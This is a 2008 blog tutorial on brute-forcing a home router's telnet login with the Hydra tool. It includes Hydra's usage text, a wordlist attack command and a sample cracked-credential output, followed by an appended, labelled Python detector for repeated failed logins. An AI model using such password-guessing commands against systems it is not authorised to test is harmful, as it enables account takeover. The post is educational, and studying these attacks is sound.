Tuesday, November 4, 2008

Hydra / Hydra GTK - Basic Cracking (Hacking)

Well, it's time to begin a short series on Hydra. I was very surprised at how many hits my original blog post received. Unfortunately, it didn't really have any useful information. Ha! BUT this post is to make up for it. So, we are going to start with some basic cracking. At this time I won't be getting into installing it on any particular operating system.


If you run the program with no arguments, you get this:


Hydra v5.4 [http://www.thc.org] (c) 2006 by van Hauser / THC

Syntax: ./hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]

Options:
-R restore a previous aborted/crashed session
-S connect via SSL
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-e ns additional checks, "n" for null password, "s" try login as pass
-C FILE colon seperated "login:pass" format, instead of -L/-P options
-M FILE server list for parallel attacks, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f exit after the first found login/password pair (per host if -M)
-t TASKS run TASKS number of connects in parallel (default: 16)
-w TIME defines the max wait time in seconds for responses (default: 30)
-v / -V verbose mode / show login+pass combination for each attempt
server the target server (use either this OR the -M option)
service the service to crack. Supported protocols: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd
OPT some service modules need special input (see README!)

Use HYDRA_PROXY_HTTP/HYDRA_PROXY_CONNECT and HYDRA_PROXY_AUTH env for a proxy.
Hydra is a tool to guess/crack valid login/password pairs - use allowed only
for legal purposes! If used commercially, tool name, version and web address
must be mentioned in the report. Find the newest version at http://www.thc.org

This is all GOOD information. I would bet most of you could figure out what to do from here.


So, I am going to try and break into the router at my house. Telnet is open from the inside, so that will be a good service to start with. Many home routers offer telnet as a management option, though you may need to log into the web GUI to enable it. Another good candidate is a router that shows a username/password prompt before you can do anything (NOT a web form login).

For starters, we need a password list. Open vi or notepad and create a short list of random words. Make sure your current password is NOT in the list. You could do the same for usernames, but we will assume you know the username already. :) The last assumption is that you know the IP address. I will be using 192.168.1.1, but make sure you change it if needed. If your telnet server does not require a username, then you will need to play with hydra a little bit to make it work (sorry, won't be getting into that today).

Enter this:
hydra -l admin -P passwordlist.txt 192.168.1.1 telnet

There. That was simple, wasn't it? It should complete shortly. Now, put your current password in the password list you created earlier. If all goes well, you should see something like:

[23][telnet] host: 192.168.1.1 login: admin password: abc123
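The other side of that run, as an added example that is not from the original post: a small Python detector that parses constructed telnetd failure lines and flags any source that racks up many failed logins inside a short window, which is exactly the footprint a wordlist run like the one above leaves in the router's log. The log line format, the 2008 year supplied for syslog timestamps, and the threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed syslog-style lines (assumption: a real router's telnetd wording differs):
# ten failures for "admin" from one address within seconds, plus quieter unrelated lines.
SAMPLE_LOG = "\n".join(
    [f"Nov  4 21:10:0{i % 6} router telnetd[{500 + i}]: login failed for admin from 192.168.1.50"
     for i in range(10)]
    + ["Nov  4 21:10:09 router telnetd[520]: login failed for admin from 192.168.1.77",
       "Nov  4 21:12:30 router telnetd[521]: login failed for admin from 192.168.1.77",
       "Nov  4 21:12:31 router telnetd[522]: login succeeded for admin from 192.168.1.77",
       "Nov  4 21:12:40 router dhcpd[88]: lease renewed for 192.168.1.50"]
)

# Matches only the failed-login shape used in SAMPLE_LOG.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ telnetd\[\d+\]: "
    r"login failed for (?P<user>\S+) from (?P<src>[\d.]+)$"
)

def parse_failures(log_text, year=2008):
    """Yield (timestamp, login, source_ip) for each failed-login line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # successes, other daemons, malformed lines
        # syslog timestamps carry no year, so one is supplied (assumption)
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["user"], m["src"]

def detect_bruteforce(log_text, threshold=8, window_seconds=60):
    """Return {source_ip: peak failures in any window} for sources at or over threshold."""
    by_src = defaultdict(list)
    for ts, _login, src in parse_failures(log_text):
        by_src[src].append(ts)
    flagged = {}
    for src, times in by_src.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            # slide the window start forward until it spans at most window_seconds
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[src] = peak
    return flagged
```

Tune the threshold to your router's normal failure rate; the two spaced-out failures from 192.168.1.77 stay under it, while the burst from 192.168.1.50 does not.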



Just as an FYI, I plan on making a 'mini-series' linkable on the right side. Please feel free to let me know what you would like to know about hydra and I will do a write-up on it. :)